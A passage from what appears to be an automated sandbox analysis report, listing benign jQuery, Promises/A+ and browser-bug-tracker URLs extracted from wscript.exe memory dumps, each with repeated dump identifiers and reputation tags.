                        https://code.google.com/p/chromium/issues/detail?id=449857wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://bugs.jquery.com/ticket/12359wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://jquery.org/licensewscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://bugzilla.mozilla.org/show_bug.cgi?id=649285wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://sizzlejs.com/wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://promisesaplus.com/#point-59wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://code.google.com/p/chromium/issues/detail?id=378607wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://promisesaplus.com/#point-57wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://promisesaplus.com/#point-75wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://promisesaplus.com/#point-54wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://jsperf.com/getall-vs-sizzle/2wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascriptwscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://bugs.webkit.org/show_bug.cgi?id=29084wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://developer.mozilla.org/en-US/docs/CSS/displaywscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 